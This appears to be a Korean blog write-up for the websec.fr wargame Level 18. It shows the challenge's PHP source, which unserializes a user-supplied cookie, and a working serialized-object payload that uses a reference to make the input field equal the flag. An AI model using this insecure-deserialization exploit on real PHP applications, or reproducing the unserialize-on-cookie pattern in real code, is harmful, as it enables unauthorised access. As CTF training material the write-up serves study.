source.php


<?php
include "flag.php";

if (isset (
$POST['obj'])) {
    
setcookie ('obj'$_POST['obj']);
} elseif (!isset (
$_COOKIE['obj'])) {
    
$obj = new stdClass;
    
$obj->input 1234;
    
setcookie ('obj'serialize ($obj));
}
?>
<!DOCTYPE html>
<html>
<head>
        <title>#WebSec Level Eighteen</title>
        <link rel="stylesheet" href="../static/bootstrap.min.css" />
</head>
        <body>
                <div id="main">
                        <div class="container">
                                <div class="row">
                                        <h1>Level Eighteen <small> - json_decode is for the weak</small></h1>
                                </div>
                                <div class="row">
                                        <p class="lead">
                                        Let's pretend that we gave you a serialized object before ; can you give it back please?<br>
                    This fine level was created by <mark>nurfed</mark>.
                                        You can check the sources <a href="source.php">here</a>.
                                        </p>
                                </div>
                        </div>
                        <div class="container">
                            <div class="row">
                                <form class="form-inline" method='post'>
                                    <input name='flag' class='form-control' type='text' placeholder='Guessed flag'>
                                    <input class="form-control btn btn-default" name="submit" value='Go' type='submit'>
                                </form>
                            </div>
                        </div>
                        <?php if (isset ($_COOKIE['obj'])): ?>
                        <br>
                        <div class="container">
                            <div class="row">
                                <?php
                                    $obj 
$_COOKIE['obj'];
                                    
$unserialized_obj unserialize ($obj);
                                    
$unserialized_obj->flag $flag;  
                                    if (
hash_equals ($unserialized_obj->input$unserialized_obj->flag))
                                        echo 
'<div class="alert alert-success">Here is your flag: <mark>' $flag '</mark>.</div>';   
                                    else 
                                        echo 
'<div class="alert alert-danger"><code>' htmlentities($obj) . '</code> is an invalid object, sorry.</div>';
                                
?>
                            </div>
                        </div>
                        <?php endif ?>
                </div>
        </body>
</html>


unserialize된 객체의 input 필드 값이 unserialize된 후 덮힌 flag 값이랑 일치하면 된다. input에 flag 필드에 대한 레퍼런스변수 세팅한 serialize 데이터 만들어서 보내주면 된다.


payload


O:8:"stdClass":2:{s:4:"flag";s:3:"123";s:5:"input";R:2;}

'Wargame > websec.fr' 카테고리의 다른 글

websec.fr hard level 07  (0) 2019.08.23
websec.fr medium level 31  (0) 2019.08.23
websec.fr medium level 09  (0) 2019.08.23
websec.fr medium level 05  (0) 2019.08.23
websec.fr medium level 03  (0) 2019.08.23
블로그 이미지

JeonYoungSin

메모 기록용 공간

,